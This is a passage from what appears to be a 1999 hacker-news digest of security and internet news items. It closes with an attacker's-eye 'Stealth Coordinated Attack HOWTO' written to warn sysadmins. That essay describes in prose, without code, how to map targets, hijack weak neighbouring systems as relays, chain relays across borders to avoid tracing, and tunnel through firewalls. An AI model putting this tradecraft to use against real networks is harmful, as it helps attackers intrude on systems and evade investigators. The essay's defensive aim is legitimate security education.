Foreign and Domestic ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by mmuliin3 The Joint Task Force on Computer Network Defense came to full strength in June and is in now ready monitor the nations defense networks for cyber attack regardless of where that attack may originate from. The JTF-CND works out of Global Network Operations and Security Center at Defense Information Systems Agency headquarters in Arlington, Va. and is under the control of Space Command. (Interesting quote in this article "We don't get real worried about Web page hacks," said Army Col. Larry Frank, chief of operations. "That's an appearance issue." - Somehow I don't think he gets it. Government Computer News http://www.gcn.com/vol18_no27/news/440-1.html August 23, 1999 DOD set to fight hackers both foreign and domestic Task force monitors network to give department another layer of protection against cyberterrorism By William Jackson GCN Staff When the Defense Department’s Joint Task Force on Computer Network Defense opened for business last December, it found plenty to do. “We have been at cyberwar for the last half-year,’’ deputy Defense secretary John Hamre said. “At least we had a place to work on it.’’ Hamre spoke at ceremonies this month to mark the task force’s coming to full strength in June. Since then, an interservice staff—supported by the DOD Computer Emergency Response Team, an intelligence cell and law enforcement liaisons—has been monitoring the Defense Information Infrastructure around the clock. The task force works out of the Global Network Operations and Security Center at Defense Information Systems Agency headquarters in Arlington, Va. So far, none of the cyberthreats has proved serious. But Hamre said DOD’s primary mission is to prepare for the next battle, “buying the infrastructure in advance that we know we are going to need at some time.’’ Hamre has testified to Congress about the threat of what he called an electronic Pearl Harbor—an attack on the nation’s information infrastructure. He said he was referring not to a devastating surprise attack but rather to military preparedness. “It wasn’t that we got hit, but that we were ready to respond,’’ Hamre said. Warning signs Until recently, DOD has not been ready to respond to a full-scale electronic attack. Air Force Maj. Gen. John Campbell, DISA vice director and task force commander, said the network defense unit grew out of the Eligible Receiver 97 exercise in 1997, in which National Security Agency teams waltzed into DOD systems using off-the-Internet hacking tools. No one was then in charge of defending DOD networks, and it showed, Campbell said. Awareness was reinforced by the monthlong Solar Sunrise assault on DOD systems by a pair of teen-agers last year. Today, “we are really serious about protecting our networks and our systems,’’ Campbell said. Although the task force is physically at DISA headquarters, organizationally it is part of the Space Command, reporting to the commander-in-chief at Peterson Air Force Base, Colo. The task force uses DISA’s global network management capability to monitor and analyze problems on DOD systems and coordinate responses. “We don’t fix the computers; we look at the operational side,’’ said Army Col. Larry Frank, chief of operations. “The other thing we bring to the table is command authority.’’ DISA has no authority over any of the services. The task force this spring encountered the Melissa computer virus, which spread rapidly by e-mail and threatened to swamp some DOD systems. The virus struck on a Friday, giving a two-day weekend buffer. The Defense CERT responded with a patch to block the virus within 12 hours. “We were lucky it wasn’t very damaging,’’ Frank said. The task force was aware of hacks against DOD Web sites during the air war in Kosovo, but they were not operationally significant, Frank said, because DOD does not rely on the Web to carry out its missions. “We don’t get real worried about Web page hacks,’’ he said. “That’s an appearance issue.’’ The task force has a judge advocate on staff liaison officers from DOD criminal investigative agencies. It also maintains a working relationship with the FBI and other law enforcement agencies. Most attacks come from the outside, Frank said, and dealing with them is a law enforcement issue. An attack from beyond U.S. borders might become an intelligence issue. National jurisdictions are blurred in cyberspace, Frank said. @HWA 36.0 Another Big Hole Found in NT ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by newbie NTA Monitor Ltd has discovered that Windows NT with SP4 is vulnerable to Predictable IP Sequence Numbering, also known as IP Spoofing. IP Spoofing is a technique used to to make it appear that a user has a different IP address than he is supposed to have. NTA Monitor http://www.nta-monitor.com/news/NT4-SP4.htm Microsoft http://support.microsoft.com/support/kb/articles/Q192/2/92.ASP NTA Monitor Leading Security testers ’NTA Monitor’ Discover Security Flaw in Microsoft NT4 SP4 25 August 1999 NTA Monitor Ltd have discovered a flaw (known as ‘Predictable TCP Sequence Numbering’) in Microsoft NT 4 when used with Service Pack 4 (SP4), which means that it is vulnerable to a range of attacks known as ‘IP spoofing’. Microsoft‘s web site has referred to SP4 correcting a similar problem with NT4 SP3, but it is now apparent that although there has indeed been a change to the sequence numbering method used, the new method is no more secure than SP3. NTA Monitor Ltd came across the issue in the course of an external test (also known as a Penetration Test) of the security of an Internet gateway for one of it’s over 100 corporate customers, performing the Regular Monitor test service. NTA Monitor reported to the customer the fact that one of their public servers appeared from other tests to be NT based, but had a different predictable IP sequence problem. Following confirmation from the customer that NT4 SP4 was in use, NTA then performed bench testing to confirm that the problem is generic to the product. Further discussions with Microsoft took place over several weeks, and Microsoft have now confirmed NTA Monitor’s findings. Microsoft will be addressing this issue and making it public so that systems administrators with NT4 SP4 in use can review what action they should take in light of this new risk. Each user needs to weigh up the risks from this flaw in their own particular network environment, and the impact from a potential security breach. Individual decisions will need to be made as to whether to temporarily disable NT4 SP4 servers from Internet usage, or move to alternative non-NT platforms, or to continue as is, with heightened observation of the servers. NT4 is widely used on the Internet by organisations for public-facing servers such as Email hosts (using for example Microsoft Exchange) or Web servers ( Microsoft’s Internet information Server (IIS) has large number of users). This flaw allows an attacker to communicate with the victim device whilst appearing to be another system, such as a trusted host or another system inside the organisation’s network, and thus to circumvent the device’s protections against external Internet systems. The simplest exploit possible would be sending ‘perfectly untraceable’ fake email - which will be received by staff at the victim site and be indistinguishable from a genuine email from the faked email ‘From:’ address. More serious exploits would include obtaining a remote log-in to systems as if from the organisation’s inside networks, and once achieved with further scope to attempt to take full control of the victim system. NTA Monitor will be posting news of this problem on a number of the Internet security mail lists and newsgroups. Says NTA Monitor’s Testing Development Director Roy Hills: "Although here at NTA Monitor we do a huge amount of security testing of corporate Internet security, we are not a security research company - and so we were initially surprised to find such a flaw. It appears that no one else has spotted this before, and begs the question as to whether Microsoft themselves did any testing after releasing SP4 for NT4... "However, it simply highlights a message that we make every day - that active security testing is the only way to find out whether an organisation’ s Internet perimeter is really providing the intended security - and this testing should be regular - monthly or quarterly. "Every VP or Director of IT should ask to see their organisation's last Internet security test report. "In fact many organisations have never had their security tested, and those that have tend to rely on an annual test - which is quite ineffective when you consider the fact that there are typically 5 or 6 significant new Internet security risks every month, providing remote exploitation attacks on widely used Internet software products." @HWA 37.0 Korea to Block All Porn ~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Lamer The Commission on Youth Protection in South Korea yesterday said it will ask to have the 26 local Internet service providers (ISPs) to ban access to all pornography. ISPs defying the government ban will be punished with up to two years in prison or 20 million won in fines, plus the cancellation of their business licenses. The Korea Herald http://www.koreaherald.co.kr/news/1999/08/__02/19990826_0211.htm Gov't to block online porn from abroad The government has decided to ban pornographic material from being provided by foreign servers over the Internet. The Commission on Youth Protection, which folds under the Prime Minister's Office, said yesterday it will seek to have about 26 local Internet service providers (ISPs), such as KORNET, BORANet and NETSGO, block pornographic sites provided through foreign servers. Existing laws ban pornographic material by domestic servers. But between 50 and 100 sites carried by foreign servers have been virtually unrestrained, and officials noted that domestic pornographic program providers have used the foreign servers, exploiting the loophole that limit domestic laws from being able to govern foreign-based servers. The special measure involves two steps that aim to make lewd material inaccessible to all Internet users in Korea. "The idea is to make hard-core, violent and perverted pornography illegal for all users, just as we do with printed material," Nam Hyung-ki, a commission member, said. To that end, the commission said that it will first ask the minister of information and communications to decree an administrative order to the nation's ISPs to block foreign pornographic sites early next year. At the same time, the commission will require ISPs to develop technical devices and measures, such as real-name user-ID systems, to sort out the minors among its users. Both commission officials and industry insiders said that such a measure will take some time to take root, suggesting that an all-out ban on Internet pornography is a more likely scenario in the near future. ISPs defying the government ban will be punished with up to two years in prison or 20 million won in fines, plus the cancellation of their business licenses. Meanwhile, industry insiders welcomed the announcement, but doubted that the measures would be effective. "It is technically possible, I guess, to block pornographic sites to minors. But there will always be some loophole, some minor who will use his or her parents' name to click on," an employee at one of the nation's 20 ISPs said. Updated: 08/26/1999 by Kim Ji-soo Staff reporter @HWA 38.0 Grammatically Challenged InfoCriminal Defaces Site ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Weld Pond The Tucson Unified School District's web site was defaced by what reporters have called a 'grammatically challenged' individual. The defacement left obscenities, misspellings, and grammar errors throughout the page. Local officials are investigating. Arizona Daily Star http://www.azstarnet.com/public/dnews/121-8392.html 39.0 Bank Emails Virus to Investors ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Yazmon Last Friday Fuji Bank Ltd in Japan accidently emailed a computer virus to a few global investors. A spokesperson for Fugi said that the email came from a machine that is not normally used and therefore was outside what they normally monitor. The virus, on the 14th day of each month would display the message "big stupid jerk". Financial Times http://www.ft.com/hippocampus/q14554e.htm Fuji Bank bugs investors with rude e-mail By Gillian Tett and Alexandra Nusbaum in Tokyo One of Japan's biggest banks has embarrassed itself - and risked insulting some of its key investors - by e-mailing a computer virus to dozens of fund managers worldwide. The e-mailed memo was part of a public relations offensive by Fuji Bank, which last week announced plans for a merger with Industrial Bank of Japan and Dai-Ichi Kangyo Bank to create the world's largest banking group. The bug will make recipients' computers display a message from Fuji Bank on the 14th day of each month telling the viewer in English that he or she is "a big stupid jerk!". It also changes some of the names in the e-mail to "Dr Mountain Dew". Fuji yesterday admitted it had inadvertently sent out a virus to dozens of global investors in a memo describing the three-way alliance. When it discovered what had happened, it sent a second e-mail warning recipients about the bug and the insulting message. "I have never received anything like this from a Japanese bank before," said Brian Waterhouse, analyst at HSBC Securities. "I have also never heard of a case of a Japanese bank having a computer bug problem before. But I suppose that's a sign of technological change, and them catching up with the rest of the banking world." A Fuji official said yesterday: "This computer bug is absolutely no joke . . . we have never seen anything like this before. We are determined that this will never happen again." The bank said it had eliminated the virus from its own software. It denied suggestions that the bug might have been the work of employees opposed to restructuring, saying it had come from "outside sources". Fuji had produced the merger announcement in such a hurry that it had taken the unusual step of outsourcing some of its information technology procedures rather than relying on its own staff. @HWA 40.0 IS YAHOO SPAM OR ANTI-SPAM ORIENTED? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From http://www.net-security.org/ by BHZ, Friday 27th August 1999 on 10:12 pm CET Is Yahoo for spam or against it? According to Wired reporter Chris Oakes , they play on the both sides of the coin. "Yahoo distributes the advice to users of its Yahoo Store electronic storefront hosting service. The Web site instructs users on how to send out unsolicited email to target promotional partners for their Yahoo-hosted storefronts." Read very interesting article on it below http://www.wired.com/news/news/technology/story/21461.html Yahoo Two-Faced on Spam by Chris Oakes 3:00 a.m. 27.Aug.99.PDT Can the Web's most popular site be anti-spam and pro-spam all at the same time? Anti-spammers say the contradiction is alive and well at Yahoo. See also: Yahoo: Keep Your Homestead "Anytime you're saying 'look for a list of people and send them an unsolicited message,' that's spam," said Peter Seebach, president, of tiny ISP Plethora.net in St. Paul Minnesota. Yahoo distributes the advice to users of its Yahoo Store electronic storefront hosting service. The Web site instructs users on how to send out unsolicited email to target promotional partners for their Yahoo-hosted storefronts. Seebach said he encountered the advisory pages on Yahoo after being led to the Yahoo pages by way of an anti-spam mailing list. "Step one is to build a list of sites that you want to get links from," reads the page, which is entitled "Build Traffic with Incentives." It reads: ...For example, if you are selling products related to show dogs, search for show dog in all the search engines. Add those sites to your list, then follow the links to find others. The instructions then recommend emailing the webmasters to try to get them to link. But using Yahoo's email service to spam these folks is a no-no, the instructions warn: "Note: Don't use your Yahoo! Mail account to do this, because all unsolicited commercial email is forbidden by the Yahoo! Mail terms of service." "Although this type of mail isn't really spam in the usual sense of the word, it is unsolicited, and your account could be canceled for it if someone complains." Is there a contradiction here? "We're not advocating a form message or mass distribution," said Tim Brady, executive producer of Yahoo. "What we're advocating is to use search engines to find related sites, write those sites down, and contact them. Probably somewhere in there, there's a judgment call." Seebach said these stances are all the more alarming because they contradict the company's overall opposition to spam. "In a lot other contexts, Yahoo has been fairly solidly anti-spam. So it's sort of surprising." But Brady said there is no disparity in its policies. "Yahoo Store's terms of service forbid spam, and we have shut down sites for spam. There have only been a couple of cases." "I think our policies are consistent." But to Seebach, there is no question about the nature of Yahoo's advice. "They didn't say 'find one person.' They said 'find people' -- plural -- and they acknowledge that they'd [the Yahoo Mail service] kick people off for it. The community standard is that that's considered spam." Elsewhere in the customer advice, Yahoo Store also instructs users on how to get search engines to display a Yahoo Store site address higher in the list of search results. This activity, widely considered to be corrupting search results, is similarly disdained by the Net community. Nick Nicholas, executive director of the Mail Abuse Prevention System noted that Yahoo's recommendations on search results are once again contradictory. "It's particular surprising to have that come from Yahoo. Because people are trying this all the time with sites like Yahoo." But Brady said the search advice is sound and not seeking to trick search engines. "We're clearly not advocating putting any irrelevant words in there. It's more of an education about how search engines work. If you have your front page and it's all graphics and your competitor's is all text -- and your trying to understand why your competitors come up first in a search engine -- this is a great education. It's design guidelines." He did acknowledge that the company may need to adjust the language of the instructions. "We remain strongly anti-spam and nothing we suggest or promote is in any way spam like we believe.... But I can see where potentially there's a bit of a gray area here." A gray area is problematic when it comes to stemming the growth of the Net's huge spam problem, said J.D. Falk, board member of the Coalition Against Unsolicited Commercial Email. "The problem with a gray area is that there's so many spammers out there that anybody in the gray area -- some people are going to consider it spam. My advice is to stay completely out of gray area until the complete mass of spam dies down." Editors note: By late Thursday, after this story was written, the page described above was changed. Yahoo removed the paragraph encouraging mass email and the note warning users not to use Yahoo for such mailings. Because the article was accurate when written, Wired News stands by the story. @HWA 41.0 "NINES PROBLEM" ~~~~~~~~~~~~~~~ From http://www.net-security.org/ by BHZ, Friday 27th August 1999 on 9:51 pm CET Everybody is panicking over Y2K bug who will hit us in 4 months. But did you hear for nines problem? At issue is the impact of an old programming convention that used four nines in a row -- 9999 -- to tell computers to stop processing data or to perform a special task. Read about it on Wired. http://www.zdnet.com/zdnn/stories/news/0,4586,2322320,00.html -------------------------------------------------------------- This story was printed from ZDNN, located at http://www.zdnet.com/zdnn. -------------------------------------------------------------- Will 9/9/99 create Y2K-like havoc? By Jim Wolf, Reuters August 27, 1999 7:16 AM PT URL: http://www.zdnet.com/zdnn/stories/news/0,4586,2322320,00.html WASHINGTON -- A computer glitch that could cause system failures on Sept. 9 -- 9/9/99 -- is about to get a lot of attention. In a kind of dry run for the Year 2000 glitch, authorities and computer scientists worldwide will be scrutinizing networks on that Thursday for any fallout from the so-called "Nines Problem." At issue is the impact of an old programming convention that used four nines in a row -- 9999 -- to tell computers to stop processing data or to perform a special task. End of file In the relatively unlikely case that systems misread Sept. 9 as 9999 -- without zeros as in 09/09 -- they might confuse the nines with what programmers call an "end of file" marker. Four nines in the date field could also trigger a grand total or a sorting operation, said Jim Kelton, president of Software Unlimited, an Irvine, California, software consulting firm specialized in networks and Y2K. "All nines could be interpreted as almost anything," he said. For instance, the nines might cause computers to disregard data received after Sept. 9, causing a cutoff in the updating of bank records. The glitch, which the financial industry has been fixing as part of its $9 billion Y2K preparations, could figure in customized applications written in decades-old computer languages such as FORTRAN, COBOL and RPG, experts say. Robert Banghart, director of development at Unisolve, a Costa Mesa, California, software firm working on the Y2K glitch, said a string of nines long had been used to tell computers to ''end a routine,'' or no longer execute certain instructions. Rehearsal for preparedness In a worst-case scenario, four nines in a date field could spark problems not unlike Y2K, a coding glitch that threatens to keep ill-prepared computers from distinguishing the year 2000 from the year 1900. The U.N.-backed International Y2K Cooperation Center, a global clearing house for millennium bug data, is using Sept. 9 to rehearse a plan aimed at keeping up-to-the-minute tabs on how the world is faring as it enters 2000. "It's a dry run for the rollover date," said Lisa Pelegrin, spokeswoman for the Washington-based, World Bank-funded center. "We will be testing our reporting system." That reporting system, to be updated in real time on the center's Web site, www.iy2kcc.org, ultimately will reflect the input of 170 or more national Y2K coordinators. On the center's Sept. 9 shakeout run, about 15 countries are expected to take part. For the most part, they are members of its steering committee -- Britain, Bulgaria, Chile, Gambia, Iceland, Japan, Mexico, Morocco, Netherlands, Philippines, South Korea and the United States. New Zealand and Australia, also active backers, are due to report in. Graeme Inchley, Australia's Y2K coordinator, told Reuters that he was ``absolutely convinced'' Sept. 9 would go by without a hitch. First test for Y2K center Sept. 9 also will mark the first test of a $40 million-dollar U.S. inter-agency Y2K center meant to give U.S. decision makers a round-the-clock view of Y2K problems in their areas of responsibility. Likewise, on Sept. 8 and 9, the North American Electric Reliability Council, an industry group, will rehearse an emergency scenario to test operating, communications and contingency responses for the Y2K transition. "If all goes well in this drill, the electric utilities can pat themselves on the back; if not, they may be tempted to blame the 'nines','' said Janis Gogan, an information technology expert at Bentley College in Waltham, Mass. Mitch Ratcliffe, editorial director of publisher Ziff Davis's Y2K Web site, rated Sept. 9's chance of triggering problems as extremely low because the date would have to be misrepresented -- without zeros as in 09/09 -- "in a way that defies logic." "The Nines Problem is almost totally a myth," he said. @HWA 42.0 Stealth Coordinated Attack HOWTO ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This was emailed to us by the author and is a very well written piece full of important information for the sysadmin and hacker alike, definately a must-read by all. - Ed Contributed by Dragos Ruiu note: this was written before the l0pht antisniff annoucement was made so that's why the future tense. And I'm not talking about route table hijacking as the DHCP vulnerability :-).... cheers, --dr) Cautionary Tales: Stealth Coordinated Attack HOWTO By Dragos Ruiu A lot has been written in the popular media about the effects of hostile coordinated traffic attacks (hacking), and, as a sysadmin, I find my systems increasingly under attack by hostile sources. Two years ago, we got mapped and port-scanned for vulnerabilities once a month. One year ago the scan frequency was up to once a week, and these days we get scanned several times a day with real attack attempts at least once a week. The Internet is becoming an increasingly hostile place and the traditional defenses and documentation of attack systems seems woefully inadequate. With this article, I hope to remedy some of the false misconceptions of security that some admins have. Yes, I hope that descriptions of these attack techniques scare you into beefing up security on your home PC, at your office, everywhere. Over the last fifteen or so years, as a sysadmin of network connected systems, I have seen the knowledge of computer technologies propagate across the spectrum of human population, bringing with it the traditional demographic including the stupid people, the malicious people as well as the helpful and the apathetic people. With the burst of Internet technology over the last few years there has also been a burst of new computer adoption, increasing pervasiveness of computing and networks and increasing occurrences and danger/damage caused by hostile computer use. While I don't believe for a second the over-inflated, hyped-up estimates of the cost of these hacker intrusions bandied in the media, I can vouch that the problem is real. As the chief technical weenie of our company, NetSentry Technology, I've been manning the front line defenses of our company net equipment. I've also been documenting the increasingly hostile nature of attacks on our network and would like to share some of my experiences in this area. The technical level of the attacks is increasing at an alarming pace, and I haven't seen any documentation of these new attack techniques yet, so here are some cautionary tales culled from our real-life experiences. My hope is that after reading this you will re-examine your own network security. Most organizations are woefully under-protected. The ISPs are having increasing difficulties in responding to customer requests for assistance in intrusion cases and the police are even further under-staffed and out-gunned technologically. So increasingly, it leaves companies to fend for themselves to secure their systems. Here is what you have to worry about. I wish I could take credit for all the techniques described here, but a majority of them were derived from analysis of traffic used for hostile attacks on us. Credit belongs to the anonymous hackers that have taken a run at our defenses. I write the following from the point of view of the attacker to emphasize the point that security is vastly neglected at most sites and because I want to ask, what will you do when faced with these attacks? And what can you do with your current defensive equipment? Not much, I wager. The phases of a successful attack are A) Reconnaissance, B) Vulnerability identification, C) Penetration, D) Control, E) Embedding, F) Data extraction/modification, and G) Attack relay. A) Reconnaissance The first part of a successful attack is to get to know the network topology in the region surrounding your target and the parties it communicates to. This is also an important part of the penetration of each successive layer of your target's networks. Currently, the best publicly available tool for net topology identification is Fyodor's excellent "nmap" program and derivatives. The objective of the reconnaissance is to understand as much about the target and to identify attack destinations defenses and potential attack relay bases. In private circulation, the following tools exist or will soon exist: Attack Tool: Coordinated multi-site scanners. Mapping software that distributes the mapping "probe" packets to be sent to the destination addresses and nearby sites over a number of geographically dispersed attack sites, and trickles them out at low rates to avoid detection so that there never is a lot of traffic at any one time or from any particular site (see stealth section). The results of the pokes and probes at the target that these systems send is summed and collated to build a picture of what equipment the target has installed. There was a lot of noise in the press earlier this year as some of the crude versions of these coordinated scan tools were aimed at US military sites, but either the operators of these tools have improved them to the point where the relatively immature military defense systems no longer identify these scans, or the military has found some other threat to highlight in the press and use to get funding. Attack Tool: Sniffer Detectors. Sniffers produce unique traffic patterns that may be detected. They also provide some interesting penetration vulnerabilities, as their network interfaces are placed in promiscuous mode, allowing all packets past the address filters to be processed by network stacks and applications. Some attack methods directly target security systems, which, ironically enough, are often notoriously insecure themselves. Once the security system is penetrated, all kinds of nice information like traffic patterns and passwords may be gleaned, and evidence of your attacks can be conveniently removed. And because of promiscuous listening in the sniffer you can even take it out with traffic destined for a different system. Attack Tool: DNS Zone transfer. A DNS zone lists the externally accessible points a company maintains. A nice map of the externally visible systems that your target has put on the Internet and a great attack point list. Not many sysadmins go over the name server records closely enough to detect this, however the more advanced intrusion detection systems are getting better at identifying these kinds of transfers as pre-cursors to an attack. The important information to gather is the DNS names and addresses of the target's hosts and neighbors. Then you must further identify the OS and open port configuration of each of your target's systems. The latter is determined using site scanners and analyzing the responses that a site delivers. Current tools such as "nmap" and "queso" are getting very good at determining device, OS version and some network application configuration information from careful analysis of the timing and contents of responses to probing or mapping traffic. The OS and port configuration are used to identify systems that could have software packages with vulnerabilities and bugs open for exploits. Knowing who your target's ISPs are by analysis of address use can provide useful attack bases for your onslaught Getting into their ISP's equipment and servers first could enable you to get important information about them and if you can subvert equipment installed on the same network links as your target can let you glean important information such as traffic patterns of your target. All without your target even suspecting. It may also be easier to penetrate the ISP than a secure target. Some ISPs such as @Home even keep extensive (but often out of date) databases listing customer's hardware and software configurations as well as other info, which if accessed can mitigate some of the dangers of triggering intrusion detection systems with your site scanning traffic. Once the traffic patterns of the target's external traffic are known, a basic technique to take out a secure target is to first take over a less secure target that your main target talks to, and then come in to your main target under the cover of that site's usual traffic. Any site your target talks to periodically, including popular web sites, employee's dial-up accounts, and system traffic, such as network time protocol (NTP) clocks, are all candidates for attack relays. Sprinkling in your attack traffic with large web downloads and ftp transfers will make it more difficult for security personnel to use sniffing and detection tools to identify your attack, as scrolling through reams of logs and captured data can often be more time consuming than possible with most network staffing levels. Taking out and controlling your target's conversation peers can provide you with useful channels through your target's defensive firewalls and detection systems. Your traffic will look on all the scanners like that web-site the Joe in IT is surfing to, but will provide you with a nice channel right past all the firewalls to a machine inside the core of your target's net. One useful target is the DNS caches and servers that your target uses at your ISP. Accessing the DNS logs can give you the addresses of all the sites that your target talks to, and furthermore, careful analysis can even give indication of when the activity happened, or is happening, offering excellent potential for cover. As we'll talk about later, owning the DNS server can have many benefits. In general the DNS servers are ripe with hacking opportunities. Another useful target is the ISP DHCP server, which is used to dynamically assign IP addresses to clients on connection, as it can be used to identify periods of system activity from the logs, and also periodically establishes connections to the client systems as the address leases expire. A common DHCP vulnerability also allows client system takeover from this ISP host. DHCP address lease expiry also provides a nice way to signal embedded attack software at pre-determined times to do things like wake up in the middle of the night and send data when no-one is looking. An often available source of useful relay bases for attacks is other systems in the same ISP client pool (on the same modem bank, other ADSL users on the same DSLAM, or cablemodem users on the same segment), which are in many cases default configuration, open like Swiss cheese, Windows systems - typically with file-sharing turned on and personal web services enabled, a combination that sports a plethora of available vulnerabilities to exploit. After taking out the easy "marshmallow" soft client PC, the adjacent main target can then be attacked using local subnet attacks, offering again some potentially powerful techniques for hiding from and exploiting your target's security systems. In easy cases, the equipment rack will bridge broadcast traffic between the "marshmallow" and the target, allowing use of address resolution traffic such as ARP and DHCP to be used for system attacks and control. For stealth, these kinds of attack bases are excellent too, because the broadcast traffic is largely repetitive, very voluminous, and mostly uninteresting, which, combined with a great immaturity among the security tools for this kind of traffic, make it a ripe vulnerability area. Local area broadcasts can also be used as another "mapping" system too, even in passive listening to traffic at the nearby "marshmallow". By recording the address lookup broadcasts from your target, you can build up that traffic pattern information so that you can sneak into the site undetected. Another often overlooked source of mapping and reconnaissance information (and break-ins) is the management systems the ISP may be maintaining. The Simple Network Management Protocol (SNMP) that most of these systems use is a bit too simple and is ripe with vulnerabilities, rich with information (including complete remote sniffers useable to pick up passwords in some RMON MIB equipment) and lame about security. The most powerful relay base for attacks is the ISP's router system. Once you control the paths of your target's packets, you really have them at your mercy, as you can silently redirect any of their traffic to your attack relay bases without them knowing, and other fun tricks. However, most ISPs guard their Ciscos and other routers as the most valuable resource with the most defenses, so this is really a target for the most daring and brilliant attacks. B) Vulnerability Identification The objective of the mapping phase is to find externally accessible traffic paths into your target's net systems. Over the last year it has been easy to see what are the most popular scriptware for the so called script-kiddies: the low-tech, mostly teen, hackers who just download pre-compiled exploits and run it blindly against targets. The standard script-kiddy technique is to set up a broad address sweep broadcast of probe traffic, to the whole section of the Internet that seeks some sort of response from the target, that would indicate that software is installed with the vulnerability the exploit is using. The classic vulnerabilities that we frequently see sweeps for are: o FTP Server Exploits. Especially vulnerable are servers with anonymous write access. o NFS and SMB share vulnerabilities. o Holes in POP and IMAP mail delivery servers. o Vulnerabilities in the "bind" name daemon software. o Web server CGI exploits (Apache, MS IIS). o Installed control daemons such as BackOrifice. The scans for these holes are so common these days that it is difficult for most sites to even catalog origins of such scans. These kinds of scans are so commonplace that, as long as traffic volume and frequency is controlled, it is possible to conduct them with relative impunity. But the attacker has to be prepared for the case of zealous sysadmins who contact ISPs and complain about port-scans. Never port-scan from a node you are not prepared to have disconnected, seized or otherwise lost. Here, the best policy is to use the least useful and network connected systems in your attack fleet of controlled systems as they may be lost or jammed and blocked by firewall software when the hostile mapping probe traffic is detected. Mapping traffic stands out like a sore thumb when pointed at systems not running the vulnerable software - if the target has the tools to analyze this kind of attack (i.e. Abacus Sentry). If attacking a net-savvy sysadmin, he will be able to detect things like IMAP probes against servers not running mail software. However, even these days, targets with effective intrusion detection systems are few and far between. And sysadmins with enough time to examine, properly and frequently, all their logging systems are even fewer. At the sites that have management and security systems, these are ripe targets too. Penetrating the security system has the best advantage of rendering the target effectively blind. I have seen experienced sysadmins dismiss unquestionable, hard evidence of tampering because their beloved and trusted, but thoroughly compromised, security sniffer shows them that there is nothing to worry about - or doesn't even show that kind of data at all. The other factors in the attacker's favor are the egos of the network designer and IT group. Every sysadmin thinks their defensive plan is carefully thought out and "their" system couldn't possibly be penetrated. Here at NetSentry we used to contact operators of systems that had been compromised and were now being used for attacks against us. But after many hours of fruitless attempts to convince maintenance personnel, who, if you did reach them, often didn't even understand the attack traffic their own site was launching, insisted that it "couldn't possibly be our system, it must be your equipment or monitors that are wrong." I remember very vividly one ISP we contacted: when we were watching, in pretty much real time, as the attackers were compromising system by system at their site and using each as a base for attacks against us, how their support person and security specialist looked at some local system when we called and decided that we couldn't possibly be correct. An hour later, as the ISP's systems being used as attack relays switched from probing to all out denial of service flooding and attacks, we called back and everyone had happily gone home for the night there. We never did bother to call them again and as far as we know the attacker still owns all their systems. The only guys who really took one of our attempts at warnings seriously was the security department at a regional bank, who came in on a Saturday to put sniffers on the line - but they were a notable exception. The best targets are those that are the most widely known, used, and difficult to take off-line or re-locate. Mail, DNS, Web and FTP servers all fall into this category. With these servers, sites that notice suspicious traffic will often not off-line them because they are critical to network operations. And even if they take them off line and restore them from backup, or otherwise keep you out, they are often forced to bring the servers back with the same vulnerability as was available for initial entry because user complaints about the unavailability of network resources override the attempts to identify and close the hole. Like penetrating the sniffer and management systems, the mail servers also provide excellent opportunities at invisibility, by letting you monitor internal conversations, what aspects of the intrusion have been detected and what countermeasures are being mandated. C) Penetration The most successful hack is the one where the target doesn't even know it has been penetrated. The next best thing is that when the intrusion is detected, they won't know where it's coming from. Since the source may be detected, it's better to use attack relays so the attacker's anonymity can be maintained. The general technique is to quickly find some clueless newbie who has put his home system or office server on the net with major vulnerabilities, and use that as a relay. Never use a system with your name or organization attached to it to attack. Use several levels of indirection and make sure you cross several geographical and political boundaries to hide your trail. ISPs in the same country often will not share log information and this gets even more difficult across borders. I listened with sympathy when I heard a poor overworked security colleague who works for the Canadian RCMP describe the nine month process (!) for the paperwork to request log files from U.S. ISPs. The police and ISP security departments often have their hands tied by procedure and policy and general understaffing. The more organizational and geographic boundaries that your attack redirection trail can cross, the more safe and anonymous you will be. People complain about the lack of anonymity on the net, but for those that cross that line into unauthorized systems use, there is altogether too much anonymity. It's often almost impossible to follow a chain of connections through multiple ISPs and countries. The hidden are truly anonymous on the net. Sysadmins should give up now on the romantic idea that you will be able to track down who is attacking you - it's just another bunch of random numeric addresses, and even if you trace it down to an ISP, their logs will only point to another ISP and so on. If the attacker can knock out the target's intrusion and sniffing facilities then you can proceed the rampage though their network with relative impunity, but even if you don't have the technology to compromise such systems, there are a number of techniques you can use to make your attack more stealthy. Attack Tools: Firewall tunnels. There are a wide variety of virtual private network and proxy programs, which you can use to relay your traffic to inside a protected network and not make the traffic appear on an intrusion detection system. Literally dozens of such firewall "borers", such as HTTPtunnel, are available now in source and binary form. These tunnel programs relay your traffic through the firewall and IDS systems by making it look like innocuous transfers to and from your "mole" system to common web-sites and other forms of traffic "chameleoning" to make it look unexceptional. These tunnels embed your attack and control traffic inside this relatively innocent looking traffic to seem like HTTP or partial TCP fragments. These tunnels can also encrypt your traffic, making it more difficult for your target to identify the penetration methods. Most sites employ hard-shell, layered network security. That is to say the links external to the organization have firewalls and net proxies to restrict access to the inside network. The standard technique is to have a hardened Demilitarized Zone (DMZ) made up of firewalls and security IDS systems. The most secure sites will have multiple servers and systems dedicated to these roles, but the majority of installations often rely on one inadequate server for this gatekeeper function. And once you are through this shell, which is checked most often by maintenance personnel, you are usually into the internal network that has almost no security. Another often overlooked security breach is to use floppy based Linux distributions such as the Trinux project, or client software for common Windows and NT systems, to carry in such a tunnel program physically into the organization where it can be surreptitiously installed on a system inside the "hard" shell. This "mole" or tunnel can then penetrate the security from the inside where vulnerabilities are seldom checked. >From this attack relay base, you can proceed to scan the internal systems and take over other servers, further embedding your control of their infrastructure. Firewalls are hardened quite well these days. But even so, some firewall operations can be predicted and broken, in areas like the port number sequences of outbound connections. With predictable sequence number connections, firewall connections can be hijacked and attack sequences passed through the defenses. And while firewalls are often tough, many sysadmins make mistakes and leave vulnerabilities open on the host the firewall runs on (like running Microsoft IIS on the firewall), allowing penetration and access to both the internal and external Ethernet interfaces on the box for malicious software to bridge 